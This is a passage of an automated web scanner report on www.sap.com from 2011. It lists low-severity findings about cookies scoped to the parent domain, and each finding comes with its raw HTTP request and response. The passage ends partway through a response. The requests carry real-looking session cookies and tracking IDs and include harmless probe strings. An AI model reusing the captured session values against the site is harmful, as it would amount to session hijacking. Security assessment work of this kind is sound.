Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000009,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:05 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.30. http://www.sap.com/news-reader/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news-reader/?articleID=17603&_=1318690575808 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.comzzzzzz=yyyyy
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Location: /news-reader/index.epx?articleID=17603&_=1318690575808
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:52 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:52 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:51 GMT

11.31. http://www.sap.com/news-reader/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /news-reader/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news-reader/index.epx?articleID=17603&_=1318690575808 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=check#true#1318690607|session#1318690546019-990768#1318692407

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:55 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:55 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:55 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:55 GMT
Content-Length: 50791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.32. http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42472
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:27 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:27 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:27 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.33. http://www.sap.com/print/sme/search/SAP_nn6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /print/sme/search/SAP_nn6.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /print/sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33815
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:47 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:47 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.34. http://www.sap.com/print/zzzzzz=yyyyy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /print/zzzzzz=yyyyy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /print/zzzzzz=yyyyy HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 33727
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:46 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:46 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.35. http://www.sap.com/search/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /search/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22185
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:20 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:20 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:20 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.36. http://www.sap.com/search/search-results.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /search/search-results.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /search/search-results.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Content-Length: 64
Cache-Control: max-age=0
Origin: http://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

searchsite-input=sql+data+orm+faq+contact+help+phone+123+456+789

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:24:10 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:24:10 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:24:11 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:24:10 GMT
Content-Length: 26041


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.37. http://www.sap.com/siteservice.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /siteservice.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /siteservice.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Content-Length: 55
Origin: http://www.sap.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

suggest:sql data orm faq contact help phone 123 456 789

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:23:56 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:23:56 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:23:56 GMT

11.38. http://www.sap.com/sme/howtobuy/solution_adviser.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/howtobuy/solution_adviser.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/howtobuy/solution_adviser.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/sme/solutions/businessmanagement/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:29:25 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:29:25 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:29:24 GMT
Content-Length: 48825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.39. http://www.sap.com/sme/partners/findpartner/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/partners/findpartner/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/partners/findpartner/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690682|check#true#1318688882

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:27:02 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:27:02 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:27:02 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:27:02 GMT
Content-Length: 50382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
11.40. http://www.sap.com/sme/search/SAP_nn6.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/search/SAP_nn6.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/search/SAP_nn6.js HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/sme/search/index.epx?q1=xss+sqli+httpi+111+222+333+444+555
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 404 File Not Found
Cache-Control: private
Content-Length: 43787
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:28:20 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:28:20 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:28:20 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.41. http://www.sap.com/sme/search/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /sme/search/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sme/search/index.epx?q1=xss+sqli+httpi+111+222+333+444+555 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/sme/partners/findpartner/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
